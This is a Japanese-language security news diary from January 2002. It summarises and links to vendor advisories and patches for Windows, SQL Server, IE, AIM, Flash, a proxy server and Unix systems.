 Macromedia オフィシャル情報: Potential standalone Flash Player security issue and SWF Clear Utility。 .swf と Flash player との関連付けを削除する「SWF Clear Utility」も配布されているそうな。 patch はまだ。

2002.01.15 追記:

 関連: Flashに忍び寄るウイルスの影 (ZDNet Security How-To)。

各種の穴
(various)

 時間がとれそうにないので、link だけでごかんべん。

UNIX 方面 fix
(various)

RedHat
Debian
Sun
HP
SGI

2002.01.09

PMTU Detection May Not Work After You Install Windows 2000 Service Pack 2 (Q301337)
(Microsoft ダウンロードセンター, 2001.12.17)

 Windows 2000 SP2 をインストールしたサーバとの間との通信で path MTU discovery がうまく動かなくなる、という話みたい。 Windows 2000 SP2 サーバと Windows 9x/Me/NT/2000 クライアントとで VPN してるときや、 NAT ルータを介して Windows 2000 SP2 サーバと交信する場合に顕著、 ということなのかな。

 patch が出ている: x86, NEC PC98

solution 3529: タイトル: 「スパイウェア」とは何か?
(トレンドマイクロ, 2002/1/9)

 たいていのスパイウェアは virus ではない、と、少なくともトレンドマイクロは判断している模様。

「sulfnbk.exe」に関するデマメール情報
(sugj-free ML, Wed, 09 Jan 2002 17:38:11 +0900)

 龍大のとある先生がおっしゃっていらっしゃった奴だな……。 ずいぶん前に流行ったものが、また流行りはじめている……ということなのかな。

Windows XP HomeからXP Proへのアップグレードを期間限定で提供
(日経 IT Pro, 2002/01/08)

 個人的には、記事そのものより、記事中リンク先の Windows XP Home Edition からWindows XP Professional へのアップグレード方法 にある

現在マイクロソフトでは、Windows XP Home Edition から Windows XP Professional へのアップグレードの際に、 技術的な問題が起こる場合があることを確認しており、 その対策のための必要な情報をまとめております。 正式にご案内をいたしますまでの間、Windows XP Home Edition がインストールされた環境へ Windows XP Professional をアップグレードするのをお待ちいただきますようお願い申し上げます。

という記述の方が気になる……。


2002.01.08

SQL Server テキストフォーマット機能が未チェックのバッファを含む (MS01-060)
(NTBUGTRAQ, Fri, 21 Dec 2001 10:29:39 +0900)

 紹介するタイミングを完全に逃してます。すいません。

 MS SQL Server 7.0/2000 が buffer overflow する他、SQL Server 7.0/2000 が呼び出す C ランタイムに format バグがあるという話。前者では SQL Server 動作権限による任意のコードの実行が、後者では DoS 攻撃が可能だという。 詳細: @stake advisory: Multiple overflow and format string vulnerabilities in Microsoft SQL Server (@stake)。

 fix が出ているので適用すればよい。SQL Server 用 fix と C ランタイム用 fix を別々に適用する必要がある。 C ランタイム fix は NT/2000 用と XP 用が用意されている。

 C ランタイムの format バグが他のプログラムにも影響するのでは? という話は FAQ に出ているので、心配な方は読んでおこう。 まあ、心配な向きは C ランタイム patch を適用しておけば ok ってことでしょう。

[memo:2511] Norton Internet Security 2002 の広告フィルターの不具合?
(memo ML, Mon, 07 Jan 2002 21:18:45 +0900)

 NIS 2002 のスクリプト、広告などのフィルタ機能に誤変換があるのでは、という指摘。 これが何らかの脆弱性に発展するとは思えないが、聞いていて気持ちいい話でもない。 フォロー されているように、確かに誤変換が発生するようだ。 また、proxy や「信頼のネットワークアドレス」の設定にも依存するようだとフォローされている。 http://www.keddy.ne.jp/~ill/a.html にテストページが用意されているので、NIS 2002 利用者は試されたい。

【顧客】ネットショップのセキュリティー【情報】
(Tea Room for Conference, 2002.01.07)

 関連: 多数の i モード EC 構築用CGI で個人情報が多数流出の危険(2002.1.7)。 広く利用されているショッピングカート CGI「ショッピングバスケットプロ」において、 初期設定を変更していない、あるいは別途アクセス制限をかけるなどしていないサイトでは、 顧客情報ファイルを外部から容易に参照可能になってしまっている、ということかな。 security hole というよりは administrative issue のような気はするけど、 インストーラが乱数の tmp dir つくるとかすればこれほど容易にはならないだろうし。

 v5.05i 以降へ upgrade を、というのは CGI PROGRAM SECURITY ADVISORY [CargoPro 3.34, 4.11, 5.20, 5.04i, 5.10wm] の話であって、今回の件とは関係ないみたい。 そういう意味では、開発元の告知も不適切なような気が。

経済産業省版spam法意見募集、公開回答付!
(slashdot.jp, 2002.01.07)

 意見できるのは今日までだそうです。意見したい人は急ごう。


2002.01.07

IE GetObject() problems
(bugtraq, Wed, 02 Jan 2002 04:02:41 +0900)

 IE 5.5 SP2 / 6 の GetObject() にまたまた問題があり、local file が読めてしまうという話。 「アクティブスクリプト」が有効である他に、 「ActiveX コントロールとプラグインの実行」 と 「スクリプトを実行しても安全だとマークされている ActiveX コントロールのスクリプトの実行」 が有効な場合に成立する模様。でも通常、全部有効なんだよね。

 回避するには上記のいずれかを無効にする。

2002.01.4 追記:

 参照: 新年早々、インターネットエクスプローラに新たな脆弱性 (netsecurity.ne.jp)。

AIMに深刻な脆弱性。高まるIMセキュリティの懸念
(ZDNet, 2002.01.07)

 今年はいよいよ来ますかねえ、IM ワーム。 すでに IRC 方面ではポピュラーな気もするんですが。

2002.01.10 追記:

 w00w00 が回避ツール (の改良版) を配布している: w00aimfilter

追記

 2001.12.28 の format バグ 3 連発 に追記した。 stunnel format バグについての注記。

SecurityFocus.com Newsletter #125 2001-12-24->2001-12-28
(BUGTRAQ-JP, Sun, 06 Jan 2002 15:11:50 +0900)

 SecurityFocus.com Newsletter 第 125 号日本語版 (テキスト, 英語版)。

Linux 方面
(various)

Vine Linux
Debian GNU/Linux
RedHat
その他

SPS Advisory #42: Black JumboDog 2.6.4/2.6.5 Buffer Overflow
(ShadowPenguinSecurity, 2002.01.01)

 汎用 proxy サーバ Black JumboDog 2.6.5 以前に弱点。 HTTP proxy 利用時に、異常な長さの expires、if-modified-since、Last_Modified を返す web サーバにアクセスすると buffer overflow してしまう。 これにより悪意ある web サーバ管理者は、Black JumboDog が稼働しているマシン上で、Black JumboDog 動作権限において任意のコードを実行できてしまう。

 Black JumboDog 2.6.6 以降で fix されているので入れかえればよい。

特集:PCに鍵をかけろ! パーソナルファイアウォール導入ガイド(3)
(ZDNet, 2001.12.28)

 Outpost Free 版のライセンスってどこに書いてあるんだろう。 みつけられないんだけど……。インストールを実行しないとわからないのかな。

FreeBSD 方面 Security Advisory
(freebsd-security ML)

過去のFreeBSD おぼえがき (Volume 58) の 2002年01月05日(土)15時01分55秒 と 2002年01月05日(土)14時57分22秒 も参照。

 FreeBSD 4.5-RELEASE では ja_JP.eucJP が標準ってわけなのかな。 あと、current 方面は S/Key はやめやめで OPIE へ移行ってコトなのかな。 ふーむ。ユーザ教育とかも考えると、今から OPIE に移行しておいた方がいいんだろうか。

 横井さんから: Linux では Locale name guideline に基づいて ja_JP.EUC-JP という名前にしようという動きになっている模様 (情報ありがとうございます)。 うーむ。統一できないものなんでしょうかねえ。


私について